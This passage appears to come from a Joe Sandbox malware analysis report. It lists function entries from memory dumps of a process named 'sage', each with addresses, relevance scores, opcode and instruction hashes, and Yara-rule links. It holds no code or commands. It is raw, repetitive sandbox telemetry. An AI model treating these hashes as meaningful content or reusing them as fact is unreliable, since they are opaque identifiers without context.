                                                                                                                                                • Opcode Fuzzy Hash: 7b06eeace01105eb4fc1b933a43c0dbce1594b56a1a0fcc9ce5937321250d7ec
                                                                                                                                                • Instruction Fuzzy Hash: 21129134A0020ADFCB15CF68C884AAEBBF1FF89314F15856AE8059B361DB31E955CB90
                                                                                                                                                Function 02A43DD8 Relevance: .5, Instructions: 457COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2617a989a2b08ca2cd497d4deb6b4c2b20a624568c317ea0cf36a3edae597bfd
                                                                                                                                                • Instruction ID: 26661c2e24393601257f377e9b628ad983eed93bfc1de1204c129594ffbd3dca
                                                                                                                                                • Opcode Fuzzy Hash: 2617a989a2b08ca2cd497d4deb6b4c2b20a624568c317ea0cf36a3edae597bfd
                                                                                                                                                • Instruction Fuzzy Hash: 32121930A00605DFCB14CF68D584BAEB7F2BF88718F258695E445EB2A5CF34E981CB61
                                                                                                                                                Function 070D8110 Relevance: .4, Instructions: 413COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 40827f8b97b20bbe125128b531b7cffd8698d475438088fbbb7c1882da9458dc
                                                                                                                                                • Instruction ID: 9e62fa068a72f7f132f9911b4780367b6411e3c6f870c4a1b89ce5f5aec21e97
                                                                                                                                                • Opcode Fuzzy Hash: 40827f8b97b20bbe125128b531b7cffd8698d475438088fbbb7c1882da9458dc
                                                                                                                                                • Instruction Fuzzy Hash: 5CE19071A14311CBC708FBB9E59A62E7BF6AB89300F814A69D445E3384DF3C9C85CB95
                                                                                                                                                Function 02A4C820 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b76220e943451b4a6d4ebc347051c98dc6ded49c69c6bd25eab6c4a52fa9f96e
                                                                                                                                                • Instruction ID: 2c216fc84564ad93db108872db73e3057e305671db554bfb54ca28384e20fb2a
                                                                                                                                                • Opcode Fuzzy Hash: b76220e943451b4a6d4ebc347051c98dc6ded49c69c6bd25eab6c4a52fa9f96e
                                                                                                                                                • Instruction Fuzzy Hash: 46B17A75A14206CBC704FBF8E98572E77F6AB88310F904869D409F3354EF389D458BA6
                                                                                                                                                Function 070D8100 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 078fe9c74a1a31e152d527d941750b9d0a69591fbd00bf17cd46a1d153ffcdde
                                                                                                                                                • Instruction ID: 017a92bbf34d678669df85289077e9569c6f291998a272565f0cb9072e75be5c
                                                                                                                                                • Opcode Fuzzy Hash: 078fe9c74a1a31e152d527d941750b9d0a69591fbd00bf17cd46a1d153ffcdde
                                                                                                                                                • Instruction Fuzzy Hash: E7B19F71A15311CBC709FBB8E49A62E7BF6AB89300F814A69D445E3384DF3C9C85CB91
                                                                                                                                                Function 02A445D8 Relevance: .3, Instructions: 309COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: fc557201aa61895c1fc67c437b5211f8828fc2607dced96b48423f7d135056fb
                                                                                                                                                • Instruction ID: 5139f6b2e39e8f0caa9201bb1b49eebc011c7ee981b01ed047a6c03e56f09303
                                                                                                                                                • Opcode Fuzzy Hash: fc557201aa61895c1fc67c437b5211f8828fc2607dced96b48423f7d135056fb
                                                                                                                                                • Instruction Fuzzy Hash: C3D1E675A00618CFCB14CFA9C984A9DBBF2BF8C314B168195E519AB362CF34EC51CB60
                                                                                                                                                Function 02A42167 Relevance: .3, Instructions: 294COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 96be21bb153339764f574e7b47545dabc8cc945322c83b7830b671e003defd23
                                                                                                                                                • Instruction ID: d449c5ee201b100d60cbfdcf4cee856cd7eec21eaa78828dc3b059ca5027b854
                                                                                                                                                • Opcode Fuzzy Hash: 96be21bb153339764f574e7b47545dabc8cc945322c83b7830b671e003defd23
                                                                                                                                                • Instruction Fuzzy Hash: 5BA17A30700215DFDB159FA8C898BAEBBA6EBC8700F148569F906DB394CF74D9418BA1
                                                                                                                                                Function 02A4B6A8 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2d0cfe8e52e1a550300eeb8c7ba346d35b4f6061da9e937985fbcc9161416807
                                                                                                                                                • Instruction ID: 526c01782c4503d048ce20cd77f46e2c4c2ecbb716b695de8e8d779f1faf943b
                                                                                                                                                • Opcode Fuzzy Hash: 2d0cfe8e52e1a550300eeb8c7ba346d35b4f6061da9e937985fbcc9161416807
                                                                                                                                                • Instruction Fuzzy Hash: 85411234A012488FC705ABB89969B5E7FB3EFC5301F1884A9D446DB395DE34CD0A87A1
                                                                                                                                                Function 02A446F8 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c72893b7153c7233830ef86459d7cfb301436d3ecf75e20f48f5d996c33c2d96
                                                                                                                                                • Instruction ID: 75826c19bfaac59ff024f46524142892f935ca9f5f5253f19d5451fee3c1e2ea
                                                                                                                                                • Opcode Fuzzy Hash: c72893b7153c7233830ef86459d7cfb301436d3ecf75e20f48f5d996c33c2d96
                                                                                                                                                • Instruction Fuzzy Hash: 21B1E675A00658CFCB14CFA9C984A9DBBF2FF8D314B168095E459AB362CB35EC41CB64
                                                                                                                                                Function 02A424C0 Relevance: .2, Instructions: 208COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c9a101a327f6dbd520cb56d22b460ca44551c1d995b0ad84658d4061c1cdd0eb
                                                                                                                                                • Instruction ID: e099a09f9e2ea8f5f8b7e545f1e31bdb84d89f979a134ad8ba3fdae7c2f72458
                                                                                                                                                • Opcode Fuzzy Hash: c9a101a327f6dbd520cb56d22b460ca44551c1d995b0ad84658d4061c1cdd0eb
                                                                                                                                                • Instruction Fuzzy Hash: B861BC30704201CFDB159B7988A4B7ABBA2AFC8710F148569F906CB395DF78CC42CBA1
                                                                                                                                                Function 02A477E8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: ec1d4bf7bd0d4708dffddffeaa356bf7dffaad71eee3972c93746b024d7e0834
                                                                                                                                                • Instruction ID: b9795edd5415c0661b1721b6db0eab5cd2382a5d7622db3877548352e7fc9de8
                                                                                                                                                • Opcode Fuzzy Hash: ec1d4bf7bd0d4708dffddffeaa356bf7dffaad71eee3972c93746b024d7e0834
                                                                                                                                                • Instruction Fuzzy Hash: 9771F734700285CFCBA5DF28C894A6EBBF6AF89604B5500A6E912DB3B2DF70DC41CB51
                                                                                                                                                Function 070DB94D Relevance: .2, Instructions: 187COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8b9c4f7f396bb1adc71d8f80e0f6dfd0b370581def6b44cf5d23ecbb3ff8c73a
                                                                                                                                                • Instruction ID: 8f3d634853ca7bb901b9a7fd8ec976f1e6b99c9f2fa5607199ec3f2337699f38
                                                                                                                                                • Opcode Fuzzy Hash: 8b9c4f7f396bb1adc71d8f80e0f6dfd0b370581def6b44cf5d23ecbb3ff8c73a
                                                                                                                                                • Instruction Fuzzy Hash: 7C51DEB1A14301CFC705FBF8D88562EBBF2AB89210F854AA9D444E3385DE3C9C45CBA5
                                                                                                                                                Function 02A40D87 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8e98bc9d7b728c8e0bf928ca5cb67d2fec94d171cdcef06fa9edb188b96cb3d2
                                                                                                                                                • Instruction ID: 1aad96f5c4d2e4a60b629a67b66ffe4277812c11c396bcbd3b8c0c5fc215c24b
                                                                                                                                                • Opcode Fuzzy Hash: 8e98bc9d7b728c8e0bf928ca5cb67d2fec94d171cdcef06fa9edb188b96cb3d2
                                                                                                                                                • Instruction Fuzzy Hash: 1071E174E00218DFDB14DFA9D894AADBBB2FF89300F24816AE515AB364DB349942DF50
                                                                                                                                                Function 02A4BCC0 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2e49d51f1f6a7f19c00e76a82c3e73dfc0883a4e2999906326e1146df0ee38bf
                                                                                                                                                • Instruction ID: 441c91620c99ae1fa9fdba72c6c181be3e421e200bff471271a1bf866f969ad0
                                                                                                                                                • Opcode Fuzzy Hash: 2e49d51f1f6a7f19c00e76a82c3e73dfc0883a4e2999906326e1146df0ee38bf
                                                                                                                                                • Instruction Fuzzy Hash: F3B09238024508CBE6183BB0FA8F0693F3CAE442273402820B22B805A08FB099908A61
                                                                                                                                                Function 02A49400 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7c3fa37d83e807513d53fda2bc6d7a1633743c3d7845e9b26fb83db85c2ea410
                                                                                                                                                • Instruction ID: 480482e6ec78fff1951fd10c87457d6ca013c91477d4d2640b5560a174a2cfd6
                                                                                                                                                • Opcode Fuzzy Hash: 7c3fa37d83e807513d53fda2bc6d7a1633743c3d7845e9b26fb83db85c2ea410
                                                                                                                                                • Instruction Fuzzy Hash: 9F51C43460434ADFCB11CF68C8849AFBBB5EF86310F5588A6D845C7215DB31E926CBA1
                                                                                                                                                Function 02A44430 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7f1888ed8fdb1af46f1ccab578cbed9d16698fa19990e17d0e5eb56c6543da0d
                                                                                                                                                • Instruction ID: 5d4f9736cfe6b476b79b183f419c0fd6d1a3f327831c71c2a1b84c475ac1efbb
                                                                                                                                                • Opcode Fuzzy Hash: 7f1888ed8fdb1af46f1ccab578cbed9d16698fa19990e17d0e5eb56c6543da0d
                                                                                                                                                • Instruction Fuzzy Hash: F6419D357002048FDB189B69D854AAEBBB7EFCD710F148169E906D7390DE71DC02CBA2
                                                                                                                                                Function 02A49DC3 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9d8d27165d976f2144828d415b9c2e0168858e1fe355a72ff1a1e21f6b7b9700
                                                                                                                                                • Instruction ID: e89f0fbd40405de47dd0117e7bcdffd9a85c317ec31fb71161a9ef6cbe530a75
                                                                                                                                                • Opcode Fuzzy Hash: 9d8d27165d976f2144828d415b9c2e0168858e1fe355a72ff1a1e21f6b7b9700
                                                                                                                                                • Instruction Fuzzy Hash: 3441A431A0424ADFCF11CFA4C985ADFBFB1AF89314F048156E805AB265DB31E925CF91
                                                                                                                                                Function 02A44BC8 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 52484f42c996b9b2323832a6af22608a620cc0b7924104aea4bd35b865b44afe
                                                                                                                                                • Instruction ID: 9bc2b45acefe06400d69f0416eff64844181e60a84f5bf481012a0468b4e8b1c
                                                                                                                                                • Opcode Fuzzy Hash: 52484f42c996b9b2323832a6af22608a620cc0b7924104aea4bd35b865b44afe
                                                                                                                                                • Instruction Fuzzy Hash: 6D51B275E012189BDB08DFAAD940BEEBBB2BF89310F148029E515B7354DB349945CFA0
                                                                                                                                                Function 02A4B258 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b441ad565db3e5f9b01a625953a4aa17c8499940a4f5c8612164905e6503267d
                                                                                                                                                • Instruction ID: 01f40add864c0f7cb8abb9cc31f1248af6ba073d62948fe23ddcc77d300c68c1
                                                                                                                                                • Opcode Fuzzy Hash: b441ad565db3e5f9b01a625953a4aa17c8499940a4f5c8612164905e6503267d
                                                                                                                                                • Instruction Fuzzy Hash: 58419F31704254CFCB099F69E858A6E7BA6EBC9359B0444A9E849CB3A1CF34DD41CB61
                                                                                                                                                Function 02A41023 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7513dafb6e9e5d6801dcb4142642f4315f22937a1072f45bb92a5f604fc10f18
                                                                                                                                                • Instruction ID: 342245fe7af12845b6f6ccbc0333b5e6e045272776298b4fd17cecc6b155cefa
                                                                                                                                                • Opcode Fuzzy Hash: 7513dafb6e9e5d6801dcb4142642f4315f22937a1072f45bb92a5f604fc10f18
                                                                                                                                                • Instruction Fuzzy Hash: A3411574E05209DFDB04CFAAD4806EEBBF6BF8A304F10906AD409B7251DB359A85CF54
                                                                                                                                                Function 02A40848 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 669717141fa81dc45f5baa9411c1d9eb5036d7257ab65a2fd0ee3b817c2d1ede
                                                                                                                                                • Instruction ID: e5856570995ff7bef1e8eed7233ee4cdcbd1029ad9d42b680b8762ece1672d0b
                                                                                                                                                • Opcode Fuzzy Hash: 669717141fa81dc45f5baa9411c1d9eb5036d7257ab65a2fd0ee3b817c2d1ede
                                                                                                                                                • Instruction Fuzzy Hash: BD41A274E012089FDB08DFAAD9847DEBBF2BF88310F548029E514A7354EB3899468B60
                                                                                                                                                Function 02A4217A Relevance: .1, Instructions: 106COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 73e94e1dd4b75d6ec8db71fc5450ef259b2a9477c1fcf898db147fbc9ababf2a
                                                                                                                                                • Instruction ID: 664d37a73a62ffd5d2e4a3e74fe015da6a15f18d425a4d61c5a98d8fac957a55
                                                                                                                                                • Opcode Fuzzy Hash: 73e94e1dd4b75d6ec8db71fc5450ef259b2a9477c1fcf898db147fbc9ababf2a
                                                                                                                                                • Instruction Fuzzy Hash: 2D315A30A092909FC7119B348498399BF72EFC6225F0985EAED41CB262DF70D84AC760
                                                                                                                                                Function 02A4C68D Relevance: .1, Instructions: 102COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5d7d6449e2273cf704d6feeb6c3ca5b5f9d1c17b66b6108eebfbe2d3f353c881
                                                                                                                                                • Instruction ID: 19fb8330d48b9640d3a0a139d7fe26754b3e53dc525b4d8c86871209c8ef6310
                                                                                                                                                • Opcode Fuzzy Hash: 5d7d6449e2273cf704d6feeb6c3ca5b5f9d1c17b66b6108eebfbe2d3f353c881
                                                                                                                                                • Instruction Fuzzy Hash: EF31BE7190E285CFC302ABB4D8A96197FB2EF82210F4544EBD088E7182CF3C8855C796
                                                                                                                                                Function 070DB834 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a503ead392f5ce5ab9c280426d27282b1fbb1d581e043aad90ae481f0f123919
                                                                                                                                                • Instruction ID: 5ad0b4813793a9f1577a13a596060a55fcfcd810f1a6c0dae5fed1be2299f7c0
                                                                                                                                                • Opcode Fuzzy Hash: a503ead392f5ce5ab9c280426d27282b1fbb1d581e043aad90ae481f0f123919
                                                                                                                                                • Instruction Fuzzy Hash: DF31E4726193808FC30677BCE89926DBFE1EF86211F460AAAD484E7291DE3C4C48C395
                                                                                                                                                Function 02A40DC8 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 590158656315f10957af4c4f94b9d09e4bf12ceef52d2c239bb05605169701c8
                                                                                                                                                • Instruction ID: 385bee633b456a376dc7e1022b2a15fd55ab96e94412febc0407d30bcd40c09b
                                                                                                                                                • Opcode Fuzzy Hash: 590158656315f10957af4c4f94b9d09e4bf12ceef52d2c239bb05605169701c8
                                                                                                                                                • Instruction Fuzzy Hash: D4410274E04219DFCB18CFA9D994ADDBBF2BF89300F10856AE905A7260DB309946DF50
                                                                                                                                                Function 02A44BBB Relevance: .1, Instructions: 91COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1f6b05f43b5a280b676ce2eccfa87972f6d7db96f9df16c86f96d463e5e7f5e3
                                                                                                                                                • Instruction ID: bce81065d3321c0f183f6b0275c2ca575a051254a9a53f4b45a5484df2345d30
                                                                                                                                                • Opcode Fuzzy Hash: 1f6b05f43b5a280b676ce2eccfa87972f6d7db96f9df16c86f96d463e5e7f5e3
                                                                                                                                                • Instruction Fuzzy Hash: E531E575E013089FDB09DFAAD954AEDFBB2BF89300F14806AE405B7351DB305946CBA0
                                                                                                                                                Function 02A4A3F8 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: f38de44cce92775f6f1b889b2e9e92a312a2b2dd4cb3d53601fdc0536e4d31a8
                                                                                                                                                • Instruction ID: 6f54b06764229a7bf54fb2ab420b7f505a18335d8514e7e2277a975d5ba935f8
                                                                                                                                                • Opcode Fuzzy Hash: f38de44cce92775f6f1b889b2e9e92a312a2b2dd4cb3d53601fdc0536e4d31a8
                                                                                                                                                • Instruction Fuzzy Hash: 7D2181367406118FC7249B2CC8A8A6AB7E6EFC972075A4169ED05CB376DF71DC06CB90
                                                                                                                                                Function 02A4C6D6 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bb0efe816f6b06b1e4c2417abcdf1dfd7daac7b3cbdafe187bb8dff3764df06c
                                                                                                                                                • Instruction ID: 144ec852ca9f17790274abd311b2e93ce7a66bcd6ed4d4ce4d675d9508670123
                                                                                                                                                • Opcode Fuzzy Hash: bb0efe816f6b06b1e4c2417abcdf1dfd7daac7b3cbdafe187bb8dff3764df06c
                                                                                                                                                • Instruction Fuzzy Hash: E821B170919695CFC306ABF8D4996197FF1EF42210F4548DBD088E7182CF38C894C7A6
                                                                                                                                                Function 00DBD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5957893157.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_dbd000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9121b6a8feb0920d78386dbcf2e28a440715e17fec84f30e8e3d0270ba6f3214
